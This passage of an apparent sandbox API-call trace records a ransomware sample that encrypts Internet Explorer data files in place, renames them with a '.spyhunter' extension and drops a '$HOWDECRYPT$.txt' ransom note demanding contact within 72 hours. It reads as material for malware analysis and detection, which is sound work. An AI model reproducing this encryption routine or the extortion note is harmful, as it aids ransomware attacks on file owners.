() returned 0x2c0000 [0156.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc94b8 | out: hHeap=0x2c0000) returned 1 [0156.269] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced00 | out: pbBuffer=0x25ced00) returned 1 [0156.269] GetProcessHeap () returned 0x2c0000 [0156.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.269] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cecf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cecf8*=0x30) returned 1 [0156.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 153 [0156.270] StrStrW (lpFirst="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".txt") returned 0x0 [0156.270] GetProcessHeap () returned 0x2c0000 [0156.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.270] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cecbc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cecbc*=0xe00, lpOverlapped=0x0) returned 1 [0156.288] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff200, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.288] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x25cecbc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cecbc*=0xe00, lpOverlapped=0x0) returned 1 [0156.288] GetProcessHeap () returned 0x2c0000 [0156.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.289] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.289] WriteFile (in: hFile=0xb0, lpBuffer=0x25cecfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cecbc, lpOverlapped=0x0 | out: lpBuffer=0x25cecfc*, lpNumberOfBytesWritten=0x25cecbc*=0x4, lpOverlapped=0x0) returned 1 [0156.290] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cecbc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cecbc*=0x30, lpOverlapped=0x0) returned 1 [0156.290] CloseHandle (hObject=0xb0) returned 1 [0156.290] GetProcessHeap () returned 0x2c0000 [0156.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.290] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat.spyhunter") returned 163 [0156.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat.spyhunter")) returned 1 [0156.291] GetProcessHeap () returned 0x2c0000 [0156.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.291] GetProcessHeap () returned 0x2c0000 [0156.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.291] GetProcessHeap () returned 0x2c0000 [0156.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f22a90 | out: hHeap=0x2c0000) returned 1 [0156.291] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced00 | out: pbBuffer=0x25ced00) returned 1 [0156.291] GetProcessHeap () returned 0x2c0000 [0156.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.292] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cecf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cecf8*=0x30) returned 1 [0156.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.302] GetProcessHeap () returned 0x2c0000 [0156.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.302] GetProcessHeap () returned 0x2c0000 [0156.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2a920 | out: hHeap=0x2c0000) returned 1 [0156.302] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cecf8 | out: pbBuffer=0x25cecf8) returned 1 [0156.302] GetProcessHeap () returned 0x2c0000 [0156.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.302] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cecf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cecf0*=0x30) returned 1 [0156.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\owlvmzrc\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.302] GetProcessHeap () returned 0x2c0000 [0156.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.302] GetProcessHeap () returned 0x2c0000 [0156.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4bda8 | out: hHeap=0x2c0000) returned 1 [0156.302] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cecf8 | out: pbBuffer=0x25cecf8) returned 1 [0156.302] GetProcessHeap () returned 0x2c0000 [0156.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.303] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cecf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cecf0*=0x30) returned 1 [0156.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.303] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 94 [0156.303] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0156.303] GetProcessHeap () returned 0x2c0000 [0156.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.303] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cecb4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cecb4*=0x2800, lpOverlapped=0x0) returned 1 [0156.321] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.321] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cecb4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cecb4*=0x2800, lpOverlapped=0x0) returned 1 [0156.321] GetProcessHeap () returned 0x2c0000 [0156.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.322] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.322] WriteFile (in: hFile=0xb0, lpBuffer=0x25cecf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cecb4, lpOverlapped=0x0 | out: lpBuffer=0x25cecf4*, lpNumberOfBytesWritten=0x25cecb4*=0x4, lpOverlapped=0x0) returned 1 [0156.322] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cecb4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cecb4*=0x30, lpOverlapped=0x0) returned 1 [0156.322] CloseHandle (hObject=0xb0) returned 1 [0156.322] GetProcessHeap () returned 0x2c0000 [0156.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.322] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.spyhunter") returned 104 [0156.322] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\index.dat.spyhunter")) returned 1 [0156.323] GetProcessHeap () returned 0x2c0000 [0156.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.323] GetProcessHeap () returned 0x2c0000 [0156.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.323] GetProcessHeap () returned 0x2c0000 [0156.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4bca0 | out: hHeap=0x2c0000) returned 1 [0156.323] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cecf0 | out: pbBuffer=0x25cecf0) returned 1 [0156.323] GetProcessHeap () returned 0x2c0000 [0156.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.323] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cece8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cece8*=0x30) returned 1 [0156.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.324] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 87 [0156.324] StrStrW (lpFirst="brndlog.bak", lpSrch=".txt") returned 0x0 [0156.324] GetProcessHeap () returned 0x2c0000 [0156.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.324] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cecac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cecac*=0x2800, lpOverlapped=0x0) returned 1 [0156.326] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.326] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cecac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cecac*=0x2800, lpOverlapped=0x0) returned 1 [0156.326] GetProcessHeap () returned 0x2c0000 [0156.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.326] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.326] WriteFile (in: hFile=0xb0, lpBuffer=0x25cecec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cecac, lpOverlapped=0x0 | out: lpBuffer=0x25cecec*, lpNumberOfBytesWritten=0x25cecac*=0x4, lpOverlapped=0x0) returned 1 [0156.327] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cecac, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cecac*=0x30, lpOverlapped=0x0) returned 1 [0156.327] CloseHandle (hObject=0xb0) returned 1 [0156.327] GetProcessHeap () returned 0x2c0000 [0156.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.327] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.spyhunter") returned 97 [0156.327] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak.spyhunter")) returned 1 [0156.327] GetProcessHeap () returned 0x2c0000 [0156.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.327] GetProcessHeap () returned 0x2c0000 [0156.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.328] GetProcessHeap () returned 0x2c0000 [0156.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f38e48 | out: hHeap=0x2c0000) returned 1 [0156.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\imjp9_0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.328] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.328] WriteFile (in: hFile=0xb0, lpBuffer=0x25cec23*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ced4c, lpOverlapped=0x0 | out: lpBuffer=0x25cec23*, lpNumberOfBytesWritten=0x25ced4c*=0x127, lpOverlapped=0x0) returned 1 [0156.329] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.329] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ced4c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ced4c*=0x2ac, lpOverlapped=0x0) returned 1 [0156.330] CloseHandle (hObject=0xb0) returned 1 [0156.330] GetProcessHeap () returned 0x2c0000 [0156.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8daf8 | out: hHeap=0x2c0000) returned 1 [0156.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\imjp8_1\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.330] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.330] WriteFile (in: hFile=0xb0, lpBuffer=0x25cec1f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ced48, lpOverlapped=0x0 | out: lpBuffer=0x25cec1f*, lpNumberOfBytesWritten=0x25ced48*=0x127, lpOverlapped=0x0) returned 1 [0156.331] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.331] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ced48, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ced48*=0x2ac, lpOverlapped=0x0) returned 1 [0156.331] CloseHandle (hObject=0xb0) returned 1 [0156.331] GetProcessHeap () returned 0x2c0000 [0156.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8da08 | out: hHeap=0x2c0000) returned 1 [0156.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\imjp12\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.332] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.332] WriteFile (in: hFile=0xb0, lpBuffer=0x25cec1b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ced44, lpOverlapped=0x0 | out: lpBuffer=0x25cec1b*, lpNumberOfBytesWritten=0x25ced44*=0x127, lpOverlapped=0x0) returned 1 [0156.333] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.333] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ced44, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ced44*=0x2ac, lpOverlapped=0x0) returned 1 [0156.333] CloseHandle (hObject=0xb0) returned 1 [0156.333] GetProcessHeap () returned 0x2c0000 [0156.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d918 | out: hHeap=0x2c0000) returned 1 [0156.333] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ime12\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.334] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.334] WriteFile (in: hFile=0xb0, lpBuffer=0x25cec17*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ced40, lpOverlapped=0x0 | out: lpBuffer=0x25cec17*, lpNumberOfBytesWritten=0x25ced40*=0x127, lpOverlapped=0x0) returned 1 [0156.337] lstrlenA 